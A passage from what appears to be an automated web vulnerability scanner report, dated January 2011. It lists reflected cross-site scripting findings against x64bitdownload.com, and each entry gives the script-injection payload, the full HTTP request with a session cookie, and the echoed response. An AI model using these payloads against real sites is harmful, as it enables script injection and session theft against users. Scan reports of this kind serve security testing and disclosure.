<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html?c1f66"><script>alert(1)</script>7df9bf07e5d=1"/>
...[SNIP]...

4.1792. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9633"><script>alert(1)</script>8efe63aeaeb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadse9633"><script>alert(1)</script>8efe63aeaeb/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html" />
...[SNIP]...

4.1793. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74e97"><script>alert(1)</script>f344c05b142 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html74e97"><script>alert(1)</script>f344c05b142"/>
...[SNIP]...

4.1794. http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa475"><script>alert(1)</script>9b2f637b814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html?aa475"><script>alert(1)</script>9b2f637b814=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

4.1795. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c71c6"><script>alert(1)</script>a82c103a4fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:21:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/downloadsc71c6"><script>alert(1)</script>a82c103a4fb/t-64-bit-yahoo-messenger-download-kgzterdi.html" />
...[SNIP]...

4.1796. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 368b8"><script>alert(1)</script>79d2914fb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html368b8"><script>alert(1)</script>79d2914fb55"/>
...[SNIP]...

4.1797. http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d89e3"><script>alert(1)</script>4467668b615 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="referer" value="/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html?d89e3"><script>alert(1)</script>4467668b615=1"/>
...[SNIP]...

4.1798. http://www.x64bitdownload.com/drivers/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd51"><script>alert(1)</script>917ba9ab7e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers5cd51"><script>alert(1)</script>917ba9ab7e5/ HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers5cd51"><script>alert(1)</script>917ba9ab7e5/" />
...[SNIP]...

4.1799. http://www.x64bitdownload.com/drivers/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a41"><script>alert(1)</script>03ddb5827b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/?40a41"><script>alert(1)</script>03ddb5827b6=1" />
...[SNIP]...

4.1800. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b223c"><script>alert(1)</script>5bbc5b84076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/driversb223c"><script>alert(1)</script>5bbc5b84076/64-bit-vista-drivers.html" />
...[SNIP]...

4.1801. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b85"><script>alert(1)</script>04e93731252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.htmla1b85"><script>alert(1)</script>04e93731252" />
...[SNIP]...

4.1802. http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/drivers/64-bit-vista-drivers.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a8f2"><script>alert(1)</script>1e0be29bacc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22vista%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/drivers/64-bit-vista-drivers.html?9a8f2"><script>alert(1)</script>1e0be29bacc=1" />
...[SNIP]...

4.1803. http://www.x64bitdownload.com/featured-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 288dc"><script>alert(1)</script>a9da18bcc18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html288dc"><script>alert(1)</script>a9da18bcc18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html288dc"><script>alert(1)</script>a9da18bcc18" />
...[SNIP]...

4.1804. http://www.x64bitdownload.com/featured-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/featured-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0316"><script>alert(1)</script>cac9cd247c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:33:44 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 29191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/featured-software.html?a0316"><script>alert(1)</script>cac9cd247c2=1" />
...[SNIP]...

4.1805. http://www.x64bitdownload.com/js/general.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/general.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9880a"><script>alert(1)</script>87d32f52238 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js9880a"><script>alert(1)</script>87d32f52238/general.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js9880a"><script>alert(1)</script>87d32f52238/general.js" />
...[SNIP]...

4.1806. http://www.x64bitdownload.com/js/general.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/general.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a0"><script>alert(1)</script>0ea982c7227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/general.js4c9a0"><script>alert(1)</script>0ea982c7227 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/general.js4c9a0"><script>alert(1)</script>0ea982c7227" />
...[SNIP]...

4.1807. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a62f2"><script>alert(1)</script>4ce7a17d51f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/jsa62f2"><script>alert(1)</script>4ce7a17d51f/rating.js" />
...[SNIP]...

4.1808. http://www.x64bitdownload.com/js/rating.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/js/rating.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca2f"><script>alert(1)</script>e3cfc32ca97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/js/rating.js7ca2f"><script>alert(1)</script>e3cfc32ca97" />
...[SNIP]...

4.1809. http://www.x64bitdownload.com/linktous.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/linktous.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bea"><script>alert(1)</script>99c6425b343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /linktous.htmlb4bea"><script>alert(1)</script>99c6425b343 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
